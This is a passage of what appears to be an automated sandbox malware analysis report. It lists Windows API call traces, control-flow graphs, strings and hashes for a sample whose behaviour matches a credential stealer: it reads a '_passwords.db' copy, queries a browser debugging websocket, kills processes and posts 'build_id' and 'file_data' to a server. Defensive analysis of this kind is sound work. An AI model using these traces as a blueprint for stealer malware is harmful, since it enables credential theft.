                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrcatA.KERNEL32(00000000,?,?,00407506,?,------,?,?,?,?,00000014), ref: 004138AA
                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,",?,?,file_data,?,?,?,?,00633851,?,?,?,?), ref: 00407A63
                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00407A79
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 00407A85
                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 00407A92
                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00407AB1
                                                                                                                                                                                                                                                  • memcpy.MSVCRT(00000000,0041A9AE,00000000), ref: 00407AB8
                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,00000014), ref: 00407AD1
                                                                                                                                                                                                                                                  • memcpy.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000014), ref: 00407ADC
                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000014), ref: 00407AF5
                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000014), ref: 00407B17
                                                                                                                                                                                                                                                  • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,?,?,?,00000014), ref: 00407B1C
                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000014), ref: 00407B45
                                                                                                                                                                                                                                                  • HttpSendRequestA.WININET(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407B5B
                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000BB8,?,?,?,?,?,?,?,?,?,?,?,?,00000014), ref: 00407B69
                                                                                                                                                                                                                                                  • HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00407BE2
                                                                                                                                                                                                                                                  • InternetReadFile.WININET(?,?,000007CF,?), ref: 00407C17
                                                                                                                                                                                                                                                  • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 00407C64
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,block,?,?,?,?,?,?,?,?,?,?,?,?,00000014), ref: 00407CAC
                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00407CB7
                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 00407CC0
                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00407CCA
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: lstrlen$Internet$lstrcpy$Heap$HttpProcessmemcpy$AllocateBinaryCloseCryptFileHandleOpenReadRequestStringlstrcat$ConnectCrackExitInfoOptionQuerySendSleep
                                                                                                                                                                                                                                                  • String ID: ------$"$--$------$block$build_id$file_data
                                                                                                                                                                                                                                                  • API String ID: 2371931802-3773912656
                                                                                                                                                                                                                                                  • Opcode ID: e6b27f7c5fb395c915c855a183409fb9bed813d943871a9821f556bd1914e2b2
                                                                                                                                                                                                                                                  • Instruction ID: 8ef9556bcb9b27fc7718986cd64f5425e1259ef4970f3e192c21128dbb4bf585
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e6b27f7c5fb395c915c855a183409fb9bed813d943871a9821f556bd1914e2b2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 974295F4A001185BDB06BF628C56AFE7A6AAF81749F00542EF405672D2CF3C5F858BD9

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00413740: lstrcpyA.KERNEL32(00000000,?,?,?,?,0041A972,?), ref: 00413763
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,004073C4,?), ref: 00406C13
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: ??_U@YAPAXI@Z.MSVCRT(00000400,?), ref: 00406C1F
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?), ref: 00406C2B
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: lstrlenA.KERNEL32(00000000,?,?,?), ref: 00406C4A
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: InternetCrackUrlA.WININET(00000000,00000000,00000000), ref: 00406C5A
                                                                                                                                                                                                                                                    • Part of subcall function 0041370E: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,004073A7,0042EEFC), ref: 00413732
                                                                                                                                                                                                                                                  • InternetOpenA.WININET(?,?,?,?,?), ref: 00407E29
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,?,?,?,?,?), ref: 00407E36
                                                                                                                                                                                                                                                  • InternetConnectA.WININET ref: 00407FDC
                                                                                                                                                                                                                                                  • HttpOpenRequestA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040801D
                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,",?,?,mode,?,?,?,?,00633851,?), ref: 00408396
                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 004083A9
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 004083B5
                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000000,00000000), ref: 004083C2
                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 004083E7
                                                                                                                                                                                                                                                  • memcpy.MSVCRT(00000000,00000000,00000000), ref: 004083EC
                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,00633851,?,?,?,?,00000014,?,?), ref: 00408403
                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,00633851,?,?,?,?,00000014,?,?), ref: 00408425
                                                                                                                                                                                                                                                  • memcpy.MSVCRT(00000000,00000000,00000000,?,?,?,?,?,00633851,?,?,?,?,00000014,?,?), ref: 0040842A
                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,00633851,?,?,?,?,00000014), ref: 0040844D
                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000BB8,?,?,?,?,?,?,?,?,00633851,?,?,?,?,00000014), ref: 00408475
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,00633851,?,?,?,?,00000014), ref: 0040849A
                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,00633851,?,?,?,?), ref: 004084A4
                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 004084AD
                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 004084B6
                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 004084BF
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,00633851,?,?,?,?,00000014), ref: 00408512
                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,00633851,?,?,?,?), ref: 0040851C
                                                                                                                                                                                                                                                  • InternetReadFile.WININET(?,?,000000C7,?), ref: 00408531
                                                                                                                                                                                                                                                  • InternetReadFile.WININET(?,00000000,000000C7,?), ref: 0040857B
                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 0040858F
                                                                                                                                                                                                                                                  • InternetSetOptionA.WININET(?,0000001F,?,00000004), ref: 00408045
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrlenA.KERNEL32(?,?,?,?,?,00407506,?,------,?,?,?,?,00000014), ref: 00413879
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,00407506,?,------,?,?,?,?,00000014), ref: 004138A2
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrcatA.KERNEL32(00000000,?,?,00407506,?,------,?,?,?,?,00000014), ref: 004138AA
                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040859F
                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 004085A6
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,0042EEFC,00000000,?,?,?,?,?,?,?), ref: 00408602
                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?), ref: 00408611
                                                                                                                                                                                                                                                    • Part of subcall function 004148F3: GetSystemTime.KERNEL32(?,ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890,0042EEFC,00407497,?,00000014), ref: 00414960
                                                                                                                                                                                                                                                    • Part of subcall function 004148F3: lstrlenA.KERNEL32(00000000), ref: 004149BE
                                                                                                                                                                                                                                                    • Part of subcall function 00413806: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,004074A9,?,?,?,00000014), ref: 00413846
                                                                                                                                                                                                                                                    • Part of subcall function 00413806: lstrcatA.KERNEL32(00000000,?,?,004074A9,?,?,?,00000014), ref: 00413850
                                                                                                                                                                                                                                                    • Part of subcall function 004137C0: lstrcpyA.KERNEL32(00000000,?,?,?,?,004074B1,?,?,?,?,00000014), ref: 004137F8
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Internet$lstrlen$Heap$CloseHandle$lstrcpy$Process$Free$FileOpenReadlstrcatmemcpy$AllocConnectCrackHttpOptionRequestSleepSystemTime
                                                                                                                                                                                                                                                  • String ID: "$------$build_id$mode
                                                                                                                                                                                                                                                  • API String ID: 2829941862-3829489455
                                                                                                                                                                                                                                                  • Opcode ID: b6ac0e4d20e8280c00ee4a52078a176f0a01ba546a3fa830e67fac002179915b
                                                                                                                                                                                                                                                  • Instruction ID: c4bafd15bbe72c7753f75c76ce33fb2b6cfcd0d70a8ce77783aecb50f14d315a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b6ac0e4d20e8280c00ee4a52078a176f0a01ba546a3fa830e67fac002179915b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5932A5F4A002185BCB15BF729C56AEF7B6BAF81745F00541EF416672D2CE3C9A448BE8

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 0041370E: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,004073A7,0042EEFC), ref: 00413732
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrlenA.KERNEL32(?,?,?,?,?,00407506,?,------,?,?,?,?,00000014), ref: 00413879
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,00407506,?,------,?,?,?,?,00000014), ref: 004138A2
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrcatA.KERNEL32(00000000,?,?,00407506,?,------,?,?,?,?,00000014), ref: 004138AA
                                                                                                                                                                                                                                                    • Part of subcall function 00413806: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,004074A9,?,?,?,00000014), ref: 00413846
                                                                                                                                                                                                                                                    • Part of subcall function 00413806: lstrcatA.KERNEL32(00000000,?,?,004074A9,?,?,?,00000014), ref: 00413850
                                                                                                                                                                                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040B5BB
                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000003E8,?), ref: 0040B5DE
                                                                                                                                                                                                                                                  • PathFileExistsA.SHLWAPI(00000000), ref: 0040B5FC
                                                                                                                                                                                                                                                  • CreateFileA.KERNEL32 ref: 0040B634
                                                                                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0040B64B
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 0040B665
                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 0040B68A
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040B6A8
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 0040B6B4
                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000000,000F423F), ref: 0040B6C2
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 0040B6D6
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 0040B70E
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,00000000), ref: 0040B7DE
                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?), ref: 0040B7E9
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 0040B7F1
                                                                                                                                                                                                                                                  • RtlFreeHeap.NTDLL(00000000,00000000,?), ref: 0040B7FC
                                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000), ref: 0040B80F
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 0040B8E1
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040B8EF
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Heap$File$Process$lstrcat$lstrcpy$CloseFreeHandle$AllocateCopyCreateDeleteExistsPathReadSizeSleeplstrlen
                                                                                                                                                                                                                                                  • String ID: _passwords.db
                                                                                                                                                                                                                                                  • API String ID: 3175396866-1485422284
                                                                                                                                                                                                                                                  • Opcode ID: 451730505287d6db03fb216a09e53d2cbc0227b1ae60e765f92cb8950668dff5
                                                                                                                                                                                                                                                  • Instruction ID: dd26fa20e6740df926561d89e38a7e43f5c20e24c5d15dedf75b600327ce6420
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 451730505287d6db03fb216a09e53d2cbc0227b1ae60e765f92cb8950668dff5
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E5A1A5B59002199BCB01FFB2DC46AEE7BB9FF45305F404019F811A7191DF78AA85CBA9

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 0041370E: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,004073A7,0042EEFC), ref: 00413732
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrlenA.KERNEL32(?,?,?,?,?,00407506,?,------,?,?,?,?,00000014), ref: 00413879
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,00407506,?,------,?,?,?,?,00000014), ref: 004138A2
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrcatA.KERNEL32(00000000,?,?,00407506,?,------,?,?,?,?,00000014), ref: 004138AA
                                                                                                                                                                                                                                                    • Part of subcall function 00413806: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,004074A9,?,?,?,00000014), ref: 00413846
                                                                                                                                                                                                                                                    • Part of subcall function 00413806: lstrcatA.KERNEL32(00000000,?,?,004074A9,?,?,?,00000014), ref: 00413850
                                                                                                                                                                                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040B5BB
                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000003E8,?), ref: 0040B5DE
                                                                                                                                                                                                                                                  • PathFileExistsA.SHLWAPI(00000000), ref: 0040B5FC
                                                                                                                                                                                                                                                  • CreateFileA.KERNEL32 ref: 0040B634
                                                                                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0040B64B
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 0040B665
                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 0040B68A
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040B6A8
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 0040B6B4
                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000000,000F423F), ref: 0040B6C2
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 0040B6D6
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 0040B70E
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,00000000), ref: 0040B7DE
                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?), ref: 0040B7E9
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 0040B7F1
                                                                                                                                                                                                                                                  • RtlFreeHeap.NTDLL(00000000,00000000,?), ref: 0040B7FC
                                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000), ref: 0040B80F
                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000003E8), ref: 0040B82D
                                                                                                                                                                                                                                                    • Part of subcall function 00413740: lstrcpyA.KERNEL32(00000000,?,?,?,?,0041A972,?), ref: 00413763
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 0040B8E1
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040B8EF
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Heap$File$Process$lstrcatlstrcpy$CloseFreeHandleSleep$AllocateCopyCreateDeleteExistsPathReadSizelstrlen
                                                                                                                                                                                                                                                  • String ID: _passwords.db
                                                                                                                                                                                                                                                  • API String ID: 102524898-1485422284
                                                                                                                                                                                                                                                  • Opcode ID: bfb6670bb488a4770a93aa756208dad1c1f5594deac4f8315849cb1c44d8c299
                                                                                                                                                                                                                                                  • Instruction ID: c2ce34365f7a7f117e03430e8c543a584d37913e59bd2e1ff373fdd8620fef08
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bfb6670bb488a4770a93aa756208dad1c1f5594deac4f8315849cb1c44d8c299
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 37C1C5B59006099BCB01EF71CC46AEEB7B9FF55308F008119F81567191EF78AB89CB98

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 3254 408807-40888b call 413740 call 406be0 call 41370e call 41398e InternetOpenA StrCmpCA 3263 408891-4088c4 InternetConnectA 3254->3263 3264 4089f4-4089fb 3254->3264 3263->3264 3267 4088ca-4088f3 3263->3267 3265 408a17-408a27 call 41370e 3264->3265 3266 4089fd-408a10 3264->3266 3273 408ab4-408ad6 call 413770 * 3 3265->3273 3266->3265 3268 4088f5-4088ff 3267->3268 3269 408906-408919 3267->3269 3268->3269 3274 408a2c-408a2e InternetCloseHandle 3269->3274 3275 40891f-408923 3269->3275 3279 408a34-408a3b 3274->3279 3277 408925-408934 InternetSetOptionA 3275->3277 3278 40893a-408968 HttpSendRequestA HttpQueryInfoA 3275->3278 3277->3278 3278->3279 3281 40896e-408979 call 4147cc 3278->3281 3282 408a57-408a64 call 41370e 3279->3282 3283 408a3d-408a50 3279->3283 3292 408a66-408a70 3281->3292 3293 40897f-408981 3281->3293 3291 408aae 3282->3291 3283->3282 3297 408ab1 3291->3297 3295 408a72-408a85 3292->3295 3296 408a8c-408a99 call 41370e 3292->3296 3298 408987-408997 3293->3298 3299 408a9b-408aa9 InternetCloseHandle call 413740 3293->3299 3295->3296 3296->3297 3297->3273 3302 408998-4089a0 InternetReadFile 3298->3302 3299->3291 3302->3299 3304 4089a6-4089ab 3302->3304 3304->3299 3305 4089b1-4089f2 call 413860 call 4137c0 call 413770 3304->3305 3305->3302
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00413740: lstrcpyA.KERNEL32(00000000,?,?,?,?,0041A972,?), ref: 00413763
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,004073C4,?), ref: 00406C13
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: ??_U@YAPAXI@Z.MSVCRT(00000400,?), ref: 00406C1F
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?), ref: 00406C2B
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: lstrlenA.KERNEL32(00000000,?,?,?), ref: 00406C4A
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: InternetCrackUrlA.WININET(00000000,00000000,00000000), ref: 00406C5A
                                                                                                                                                                                                                                                    • Part of subcall function 0041370E: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,004073A7,0042EEFC), ref: 00413732
                                                                                                                                                                                                                                                  • InternetOpenA.WININET ref: 0040886C
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?), ref: 00408883
                                                                                                                                                                                                                                                  • InternetConnectA.WININET ref: 004088BC
                                                                                                                                                                                                                                                  • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00408934
                                                                                                                                                                                                                                                  • HttpSendRequestA.WININET ref: 00408948
                                                                                                                                                                                                                                                  • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00408960
                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00408998
                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00408A2E
                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00408A9C
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Internet$CloseHandleHttplstrcpy$ConnectCrackFileInfoOpenOptionQueryReadRequestSendlstrlen
                                                                                                                                                                                                                                                  • String ID: GET$p7c
                                                                                                                                                                                                                                                  • API String ID: 2041234948-2983962290
                                                                                                                                                                                                                                                  • Opcode ID: 320e718f7c480985df757210cfd3bb067cc0db8a6482ef72f91870b1b89151d2
                                                                                                                                                                                                                                                  • Instruction ID: cd878151b0f7b65b431806c7ff5f9c38d997bf391b335ef2749d71c6156296e3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 320e718f7c480985df757210cfd3bb067cc0db8a6482ef72f91870b1b89151d2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8371E3B1A002199FDB10EF61DC45BFEBBB9AF84304F00512EF8456B2D1DB789A85CB95

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 3312 409638-409659 call 420cd0 3315 409670-40968a 3312->3315 3316 40965b-409669 3312->3316 3318 409690-40969e 3315->3318 3319 40982e-40984b call 41232c 3315->3319 3316->3315 3321 4096a0 3318->3321 3322 4096c1-4096df 3318->3322 3325 409873-40987f 3319->3325 3324 4096a5-4096b8 3321->3324 3328 4096e5-409716 InternetReadFile 3322->3328 3329 409827-409828 InternetCloseHandle 3322->3329 3324->3324 3326 4096ba 3324->3326 3326->3322 3330 409745-40975d InternetCloseHandle * 2 3328->3330 3331 409718-40971d 3328->3331 3329->3319 3333 409784-40979e call 409912 3330->3333 3334 40975f-40977d 3330->3334 3331->3330 3332 40971f 3331->3332 3335 409723-40973c call 409882 InternetReadFile 3332->3335 3340 4097a4-4097ab 3333->3340 3341 40984d-409865 call 41232c 3333->3341 3334->3333 3335->3330 3342 40973e-409743 3335->3342 3344 4097ad-4097c7 3340->3344 3345 4097ce-4097e9 call 409912 3340->3345 3346 40986a-40986e call 409942 3341->3346 3342->3330 3342->3335 3344->3345 3350 4097fb-409825 call 409912 call 4123ca 3345->3350 3351 4097eb-4097f4 3345->3351 3346->3325 3350->3346 3351->3350
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,?,00001000), ref: 0040970E
                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,?,00001000), ref: 00409734
                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00409746
                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(19d), ref: 00409750
                                                                                                                                                                                                                                                    • Part of subcall function 004123CA: memcpy.MSVCRT(?,00000010,?,?,?,?,00412388,?,?,?,?,?,?,0041234F,?,00000000), ref: 00412417
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Internet$CloseFileHandleRead$memcpy
                                                                                                                                                                                                                                                  • String ID: "webSocketDebuggerUrl":$"ws://$19d
                                                                                                                                                                                                                                                  • API String ID: 1306965030-1558842042
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 009B024D
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                                  • String ID: cess$kernel32.dll
                                                                                                                                                                                                                                                  • API String ID: 4275171209-1230238691
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00415358
                                                                                                                                                                                                                                                  • Process32First.KERNEL32(00000000,?), ref: 00415362
                                                                                                                                                                                                                                                  • Process32Next.KERNEL32(00000000,?), ref: 0041536E
                                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00415392
                                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 004153A1
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004153A8
                                                                                                                                                                                                                                                  • Process32Next.KERNEL32(00000000,?), ref: 004153B0
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004153BB
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3836391474-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CreateFileA.KERNEL32 ref: 0040AEA5
                                                                                                                                                                                                                                                  • GetFileSizeEx.KERNEL32(00000000,?), ref: 0040AEB5
                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,8BE3897C), ref: 0040AED8
                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(00000000,EC8350EC,8BE3897C,?,00000000), ref: 0040AEF9
